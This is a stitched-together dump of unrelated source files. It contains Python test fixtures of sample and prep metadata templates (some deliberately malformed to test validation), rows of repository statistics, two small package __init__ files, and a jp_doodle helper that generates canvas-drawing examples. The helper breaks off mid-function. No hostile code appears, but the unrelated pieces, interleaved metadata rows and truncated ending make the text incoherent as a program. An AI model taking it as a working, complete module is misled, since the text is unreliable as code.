"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t\t\t\t\t\t\t\n"
)
SAMPLE_TEMPLATE_NO_SAMPLE_NAMES_SOME_SPACES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t \t\t\t\t\t \t\t\n"
)
SAMPLE_TEMPLATE_EMPTY_COLUMN = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\t\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"\n")
SAMPLE_TEMPLATE_COLUMN_WITH_NAS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"NA\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tNA\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"NA\n")
SAMPLE_TEMPLATE_NO_SAMPLE_NAME = (
":L}={\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"NA\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tNA\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"NA\n")
SAMPLE_TEMPLATE_INVALID_LATITUDE_COLUMNS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"1\t42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\1\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\1\tXXXXX4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_INVALID_LONGITUDE_COLUMNS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"1\t11.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\1\t4.2\tXXX\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\1\t4.8\t4.XXXXX41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_DICT_FORM = {
'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'},
'str_column': {'2.Sample1': 'Value for sample 1',
'2.Sample2': 'Value for sample 2',
'2.Sample3': 'Value for sample 3'},
'int_column': {'2.Sample1': 1,
'2.Sample2': 2,
'2.Sample3': 3}
}
SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES_DICT_FORM = {
'collection_timestamp': {'002.000': '2014-05-29 12:24:51',
'1.11111': '2014-05-29 12:24:51',
'0.12121': '2014-05-29 12:24:51'},
'description': {'002.000': 'Test Sample 1',
'1.11111': 'Test Sample 2',
'0.12121': 'Test Sample 3'},
'has_extracted_data': {'002.000': True,
'1.11111': True,
'0.12121': True},
'has_physical_specimen': {'002.000': True,
'1.11111': True,
'0.12121': True},
'host_subject_id': {'002.000': 'NotIdentified',
'1.11111': 'NotIdentified',
'0.12121': 'NotIdentified'},
'latitude': {'002.000': 42.420000000000002,
'1.11111': 4.2000000000000002,
'0.12121': 4.7999999999999998},
'longitude': {'002.000': 41.409999999999997,
'1.11111': 1.1000000000000001,
'0.12121': 4.4100000000000001},
'physical_location': {'002.000': 'location1',
'1.11111': 'location1',
'0.12121': 'location1'},
'required_sample_info_status': {'002.000': 'received',
'1.11111': 'received',
'0.12121': 'received'},
'sample_type': {'002.000': 'type1',
'1.11111': 'type1',
'0.12121': 'type1'},
'str_column': {'002.000': 'Value for sample 1',
'1.11111': 'Value for sample 2',
'0.12121': 'Value for sample 3'}}
ST_EMPTY_COLUMN_DICT_FORM = \
{'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'}}
ST_COLUMN_WITH_NAS_DICT_FORM = \
{'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'},
'str_column': {'2.Sample1': 'NA', '2.Sample2': 'NA', '2.Sample3': 'NA'}}
EXP_PREP_TEMPLATE = (
'sample_name\tbarcodesequence\tcenter_name\tcenter_project_name\t'
'ebi_submission_accession\temp_status\texperiment_design_description\t'
'library_construction_protocol\tlinkerprimersequence\tplatform\t'
'run_prefix\tstr_column\n'
'1.SKB7.640196\tCCTCTGAGAGCT\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L002_sequences\tValue for sample 3\n'
'1.SKB8.640193\tGTCCGCAAGTTA\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L001_sequences\tValue for sample 1\n'
'1.SKD8.640184\tCGTAGAGCTCTC\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L001_sequences\tValue for sample 2\n')
if __name__ == '__main__':
main()
| 47.896772 | 79 | 0.572592 | 15,213 | 135,021 | 4.895813 | 0.05423 | 0.029941 | 0.007492 | 0.009989 | 0.829605 | 0.798228 | 0.747288 | 0.72457 | 0.69189 | 0.680411 | 0 | 0.076903 | 0.302353 | 135,021 | 2,818 | 80 | 47.913769 | 0.713781 | 0.043778 | 0 | 0.625279 | 0 | 0.027691 | 0.326404 | 0.0899 | 0 | 0 | 0 | 0 | 0.123269 | 0 | null | null | 0 | 0.008933 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
56b5f82d84bd7f6563e6493350c8151edca3261f | 38 | py | Python | lemmiwinks/extractor/__init__.py | nesfit/WPD | 543afd5c60862db4aff91b1d3a89b77e690f9383 | [
"MIT"
] | 4 | 2018-01-08T22:46:03.000Z | 2018-04-08T09:02:22.000Z | lemmiwinks/extractor/__init__.py | nesfit/WPD | 543afd5c60862db4aff91b1d3a89b77e690f9383 | [
"MIT"
] | 1 | 2018-08-07T18:25:18.000Z | 2018-08-07T18:25:18.000Z | lemmiwinks/extractor/__init__.py | nesfit/WPD | 543afd5c60862db4aff91b1d3a89b77e690f9383 | [
"MIT"
] | 1 | 2018-01-08T21:13:41.000Z | 2018-01-08T21:13:41.000Z | from .extractor import RegexExtractor
| 19 | 37 | 0.868421 | 4 | 38 | 8.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
85857e316dd7c1f25ad43a0b6a8d1dd3411670c6 | 710 | py | Python | cvplus/__init__.py | AndyTsangChun/cvutil | 3f53e794a990eefe1573d3df05b2cc62f26da0a6 | [
"Apache-2.0"
] | null | null | null | cvplus/__init__.py | AndyTsangChun/cvutil | 3f53e794a990eefe1573d3df05b2cc62f26da0a6 | [
"Apache-2.0"
] | null | null | null | cvplus/__init__.py | AndyTsangChun/cvutil | 3f53e794a990eefe1573d3df05b2cc62f26da0a6 | [
"Apache-2.0"
] | null | null | null | from .py_logger import PyLogger
from .color_util import genColors
from .color_util import hsv2rgb
from .color_util import rgb2hex
from .cv_util import getTextBoxRatio
from .cv_util import drawDashedLine
from .cv_util import location2bbox
from .cv_util import bbox2location
from .cv_util import bbox_iou
from .cv_util import interval_overlap
from .img_util import normalize
from .img_util import getDownSampleImage
from .img_util import getCroppedImage
from .img_util import npa2base64
from .img_util import base642npa
from .img_util import saveImgRGB
from .img_util import PIL2CV
from .img_util import CV2PIL
from .img_util import getCenterPoint
from .img_util import distanceOfpoints
from .model import *
| 27.307692 | 40 | 0.84507 | 105 | 710 | 5.504762 | 0.295238 | 0.32872 | 0.190311 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019293 | 0.123944 | 710 | 25 | 41 | 28.4 | 0.909968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a4567015ffddbf733a1264a3934fe052e78c7e8f | 36,705 | py | Python | docs/quick_references/qr_helper.py | lingruiluo/jp_doodle | b3935208821898f22ab504c2b26dd4d37f08f0e4 | [
"BSD-2-Clause"
] | 43 | 2018-10-10T08:38:07.000Z | 2022-03-19T22:44:42.000Z | docs/quick_references/qr_helper.py | firmfrol19/jp_doodle | cb34938edaedbe15590ebe8024060dd97bb69fa9 | [
"BSD-2-Clause"
] | 8 | 2018-09-17T19:49:45.000Z | 2020-08-24T15:51:16.000Z | docs/quick_references/qr_helper.py | firmfrol19/jp_doodle | cb34938edaedbe15590ebe8024060dd97bb69fa9 | [
"BSD-2-Clause"
] | 5 | 2019-06-13T15:53:55.000Z | 2020-11-13T01:22:56.000Z | from jp_doodle.dual_canvas import swatch
from jp_doodle.auto_capture import embed_hidden, PythonExample, JavascriptExample
import inspect
# widen the notebook
from jp_doodle import data_tables
data_tables.widen_notebook()
DO_EMBEDDINGS = False
def show(frame, file_prefix=None, do_display=True):
if DO_EMBEDDINGS:
if file_prefix is None:
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
canvas_widget = frame.get_canvas()
with embed_hidden(canvas_widget, filename):
if do_display:
frame.show()
else:
if do_display:
frame.show()
def python_example(markdown, code, width=320, height=120, embeddable=True):
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
EG = PythonExample(markdown, code, filename, width, height, embeddable=embeddable)
EG.embed_prologue()
EG.embed_code()
EG.embed_widget(DO_EMBEDDINGS)
def js_example(markdown, code, width=320, height=120, axes=True, embeddable=True):
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
EG = JavascriptExample(markdown, code, filename, width, height, axes=axes, embeddable=embeddable)
EG.embed_prologue()
EG.embed_code()
EG.embed_widget(DO_EMBEDDINGS)
def js_frame_example():
return js_example(
"""
### Create a reference frame inside a dual canvas
Pixel coordinates are rarely the most convenient coordinate systems to
use for scientific visualizations. Reference frames allow drawing using
transformed coordinates. The `frame_region` method creates a frame
by mapping reference points in the pixel space to reference
points in the reference frame coordinate space. Objects can then
be drawn on the reference frame and the underlying coordinates will be
converted automatically.
The following Javascript creates a reference `frame` from the canvas `element`
and draws some reference marks on the frame. Reference axes in canvas coordinates
are also shown in grey.
""",
"""
// Map pixel coords (10,10) and (400,100)
// to frame coords (-1, 0) and (1, 2)
var frame = element.frame_region(
10, 10, 400, 100,
-1, 0, 1, 2);
// draw some reference marks on the frame:
frame.text({x:-1, y:0, text:"-1,0", color:"red", background:"yellow"} );
frame.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"yellow"} );
frame.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"})
"""
)
def js_lasso_example():
return js_example(
"""
### Selecting named objects by surrounding them with a lasso
The
```
element.do_lasso(callback, config, delete_after)
```
method allows the user to select named objects
by surrounding them with a graphical loop. After the loop is complete the callback
receives a dictionary mapping the names of the selected objects to their descriptions.
The optional argument `config` is provides configuration parameters and the
optional boolean argument `delete_after` deletes the lasso polygon after selection
if `true`.
""",
"""
// draw some named objects on the canvas
for (var i=10; i<300; i+=40) {
for (var j=10; j<100; j+=15) {
var ijtext = i+","+j
element.text({x:i, y:j, text:ijtext, name:ijtext, color:"red", background:"yellow"} );
}
}
// Add a text area to display the result of the lasso operation:
var info = $("<div/>").appendTo(element);
info.html("Mouse down and encircle elements to select them with the lasso.");
var lasso_callback = function(mapping) {
var txt = "Lasso circled: ";
for (var name in mapping) {
txt += " (" + name + "),";
}
info.html(txt);
}
element.do_lasso(lasso_callback, {}, true);
"""
)
def js_mouse_tracking_example():
return js_example(
"""
### Mouse tracking
The following code tracks mouse moves over the whole canvas
and moves an external HTML DIV and a canvas circle in coordination
with the pointer position.
""",
"""
// Mouse tracking DIV
let tooltip = $("<div>Move the mouse over the canvas.</div>").appendTo(element);
tooltip.css({background: "yellow", width:120});
// Mouse tracking circle
let circle = element.circle({name:true, x:10, y:10, r:13, color: "red"});
var event_handler = function(event) {
var element_offset = element.visible_canvas.offset();
var canvas_location = element.event_model_location(event);
var pixel_offset = element.event_pixel_location(event);
// move the tooltip near the mouse
tooltip.offset({
left: pixel_offset.x + element_offset.left + 5,
top: pixel_offset.y + element_offset.top + 5,
});
// move the circle under the mouse.
circle.change({x:canvas_location.x, y:canvas_location.y});
// Report canvas position in the tooltip
tooltip.html("x=" + Math.floor(canvas_location.x)
+ "<br> y=" + Math.floor(canvas_location.y));
};
element.on_canvas_event("mousemove", event_handler);
"""
)
def js_event_callback():
return js_example(
"""
### Displaying mouse move coordinates
The following widget contains a `rectangle` drawn on a `frame`.
The `model_location` coordinates for a `mousemove` over the rectangle
are reported in an appended `info_div` text area. The `model_location`
gives coordinates for the reference frame associated with the object.
""",
"""
// Map pixel coords (10,10) and (400,100)
// to frame coords (-1, 0) and (1, 2)
var frame = element.frame_region(
10, 10, 400, 100,
-1, 0, 1, 2);
// Create a named rectangle to receive events.
var rectangle = frame.frame_rect({x:-0.8, y:0.1, w:1.3, h:1.9, color:"cyan", name:true});
frame.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"});
var info_div = $("<div/>").appendTo(element);
info_div.html("Please mouse over the cyan rectangle");
var mouse_over_handler = function(event) {
var x = event.model_location.x;
var y = event.model_location.y;
info_div.html("x=" + x + "; y=" + y);
};
// Attach the event handler to the rectangle.
rectangle.on("mousemove", mouse_over_handler);
"""
)
def js_2_frame_example():
return js_example(
"""
### Create two reference frames inside a dual canvas
It is possible to create many reference frames inside a dual canvas each with a different
coordinate transform. The following Javascript places two canvases side-by-side and
annotates them similarly using the same frame coordinates.
""",
"""
// Map pixel coords (10,10) and (190,100) to frame coords (-1, 0) and (1, 2) in frame1
var frame1 = element.frame_region(
10, 10, 190, 100,
-1, 0, 1, 2);
// draw some reference marks on the frame1:
frame1.text({x:-1, y:0, text:"-1,0", color:"red", background:"yellow"} );
frame1.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"yellow"} );
frame1.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"})
// Map pixel coords (210,10) and (400,100) to frame coords (-1, 0) and (1, 2) in frame2
var frame2 = element.frame_region(
210, 10, 400, 100,
-1, 0, 1, 2);
// draw some reference marks on the frame1:
frame2.text({x:-1, y:0, text:"-1,0", color:"red", background:"cyan"} );
frame2.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"cyan"} );
frame2.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"green"})
"""
)
def py_arrow_example():
return python_example(
"""
### Drawing arrows
The `arrow` method draws an arrow between a head position and a tail position.
""",
'''
widget.arrow(
head_length=30,
x1=50, y1=10, # The tail end point of the line
x2=320, y2=70, # The head end point of the line
color="red", # Optional color (default: "black")
lineWidth=4, # Optional line width
lineDash=[2,2], # Optional line dash pattern
head_angle=45, # Optional head segment angle in degrees (default 45)
head_offset=10, # Optional offset of head from endpoint
symmetric=True, # If true draw two arrow head segments (default False)
)
''')
def js_arrow_example():
return js_example(
"""
### Drawing arrows
The `arrow` method draws an arrow between a head position and a tail position.
""",
'''
element.arrow({
head_length:30,
x1:50, y1:10, // The tail end point of the line
x2:320, y2:70, // The head end point of the line
color:"red", // Optional color (default: "black")
lineWidth:4, // Optional line width
lineDash:[2,2], // Optional line dash pattern
head_angle:45, // Optional head segment angle in degrees (default 45)
head_offset:10, // Optional offset of head from endpoint
symmetric:true, // If true draw two arrow head segments (default False)
});
''')
def py_double_arrow_example():
return python_example(
"""
### Drawing double arrows
The `double_arrow` method draws an arrow between a head position and a tail position
with head marks at both ends.
""",
'''
widget.double_arrow(
head_length=30,
x1=50, y1=10, # The tail end point of the line
x2=320, y2=70, # The head end point of the line
color="red", # Optional color (default: "black")
back_color="blue", # Optional color of back arrow
lineWidth=4, # Optional line width
lineDash=[2,2], # Optional line dash pattern
head_angle=45, # Optional head segment angle in degrees (default 45)
back_angle=90, # Optional back head segment angle
head_offset=10, # Optional offset of head from endpoint
back_offset=0, # Optional, offset of back pointing head mark
symmetric=False, # If true draw two arrow head segments (default False)
line_offset=5, # offset of back arrow from forward arros
)
''')
def js_double_arrow_example():
return js_example(
"""
### Drawing double arrows
The `double_arrow` method draws an arrow between a head position and a tail position
with head marks at both ends.
""",
'''
element.double_arrow({
head_length:30,
x1:50, y1:10, // The tail end point of the line
x2:320, y2:70, // The head end point of the line
color:"red", // Optional color (default: "black")
back_color:"blue", // Optional color of back arrow
lineWidth:4, // Optional line width
lineDash:[2,2], // Optional line dash pattern
head_angle:45, // Optional head segment angle in degrees (default 45)
back_angle:90, // Optional back head segment angle
head_offset:10, // Optional offset of head from endpoint
back_offset:0, // Optional, offset of back pointing head mark
symmetric:false, // If true draw two arrow head segments (default False)
line_offset:5, // offset of back arrow from forward arros
});
''')
def py_event_example():
return python_example(
"""
### Attaching event callbacks
The `object.on(etype, callback)`
attaches a `callback` to be called when the object
recieves an event of type `etype`.
""",
'''
# this circle cannot be mutated and does not respond to events because it is not named.
widget.circle(x=0, y=0, r=100, color="#e99")
# this text is named and can be mutated and can respond to events
txt1 = widget.text(x=0, y=0, text="Hello World", degrees=45, name=True,
font= "40pt Arial", color="#ee3", background="#9e9", align="center", valign="center")
# add a click event bound to the txt which transitions the text rotation
def on_click(*ignored):
txt1.transition(text="That tickles", degrees=720, color="#f90", background="#009", seconds_duration=5)
txt1.on("click", on_click)
''')
def py_line_example():
return python_example(
"""
### Drawing lines
The `line` method draws a line segment between two end points.
""",
'''
widget.line(
x1=50, y1=10, # One end point of the line
x2=320, y2=30, # The other end point of the line
color="cyan", # Optional color (default: "black")
lineWidth=4, # Optional line width
lineDash=[5,2,1], # Optional line dash pattern
)
''')
def js_line_example():
return js_example(
"""
### Drawing lines
The `line` method draws a line segment between two end points.
""",
'''
element.line({
x1:50, y1:10, // One end point of the line
x2:320, y2:100, // The other end point of the line
color:"cyan", // Optional color (default: "black")
lineWidth:4, // Optional line width
lineDash:[5,2,1], // Optional line dash pattern
})
''')
def py_polyline_example():
return python_example(
"""
### Drawing polylines
The `polyline` method draws sequence of connected line segments.
""",
'''
points = [(50,20), (40, 60), (140, 111), (300,4), (100,70)]
widget.polyline(
points=points, # The vertices of the polyline path
color="green", # Optional color (default: "black")
lineWidth=3, # Optional line width
lineDash=[5,5], # Optional line dash pattern
)
''')
def js_polyline_example():
return js_example(
"""
### Drawing polylines
The `polygon` method with `fill:false` and `close:false` draws sequence of connected line segments.
""",
'''
var points = [[50,20], [40, 60], [140, 111], [300,4], [100,70]];
element.polygon({
points:points, // The vertices of the polyline path
color:"green", // Optional color (default: "black")
lineWidth:3, // Optional line width
lineDash:[5,5], // Optional line dash pattern
fill:false,
close:false,
});
''')
def py_polygon_example():
return python_example(
"""
### Drawing polygons
The `polygon` method draws closed sequence of connected line segments.
""",
'''
points = [(50,20), (40, 60), (140, 111), (300,4), (100,70)]
widget.polygon(
points=points, # The vertices of the polyline path
color="green", # Optional color (default: "black")
lineWidth=3, # Optional line width
lineDash=[5,5], # Optional line dash pattern
fill=False, # Optional, if True (default) fill interior
)
''')
def js_polygon_example():
return js_example(
"""
### Drawing polygons
The `polygon` method (with the default of `close:true`) draws closed sequence of connected line segments.
""",
'''
var points = [[50,20], [40, 60], [140, 111], [300,4], [100,70]];
element.polygon({
points:points, // The vertices of the polyline path
color:"green", // Optional color (default: "black")
lineWidth:3, // Optional line width
lineDash:[5,5], // Optional line dash pattern
fill:false,
// close:true, // default value
});
''')
def js_circle_example():
return js_example(
"""
### Drawing circles with canvas relative radius
The `circle` method draws a circle sized relative to the canvas
coordinate system. Circles on two frames with the same radius
will have the same size.
""",
'''
// map (10,10), (100,100) to (-3,0),(3,6) in the frame
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
)
// Draw a circle positioned relative to the frame and sized relative to the canvas.
frame.circle({
x:4,
y:2.5,
r:20, // radius "r" is in canvas coordinates, not frame coordinates
color:"blue",
fill:false,
lineWidth:5,
lineDash:[5,5],
})
frame.lower_left_axes({max_tick_count:5, color:"green"});
''')
def py_circle_example():
return python_example(
"""
### Drawing circles with canvas relative radius
The `circle` method draws a circle sized relative to the canvas
coordinate system. Circles on two frames with the same radius
will have the same size.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a circle positioned relative to the frame and sized relative to the canvas.
frame.circle(
x=4,
y=2.5,
r=20, # radius "r" is in canvas coordinates, not frame coordinates
color="blue",
fill=False,
lineWidth=5,
lineDash=[5,5],
)
''')
def js_frame_circle_example():
return js_example(
"""
### Drawing circles with frame relative radius
The `frame_circle` method draws a circle sized relative to the current reference frame
coordinate system. Frame circles on two frames with the same radius
may have different sizes if the scaling differs between the frames.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
)
// Draw a circle positioned and sized relative to the frame.
frame.frame_circle({
x:4,
y:2.5,
r:3, // radius "r" is in frame coordinates
color:"blue",
fill:true,
});
frame.lower_left_axes({max_tick_count:5, color:"green"});
''')
def py_frame_circle_example():
return python_example(
"""
### Drawing circles with frame relative radius
The `frame_circle` method draws a circle sized relative to the current reference frame
coordinate system. Frame circles on two frames with the same radius
may have different sizes if the scaling differs between the frames.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a circle positioned and sized relative to the frame.
frame.frame_circle(
x=4,
y=2.5,
r=3, # radius "r" is in frame coordinates
color="blue",
fill=True,
)
''')
def py_star_example():
return python_example(
"""
### Drawing stars
The `star` method draws a star on the canvas.
""",
'''
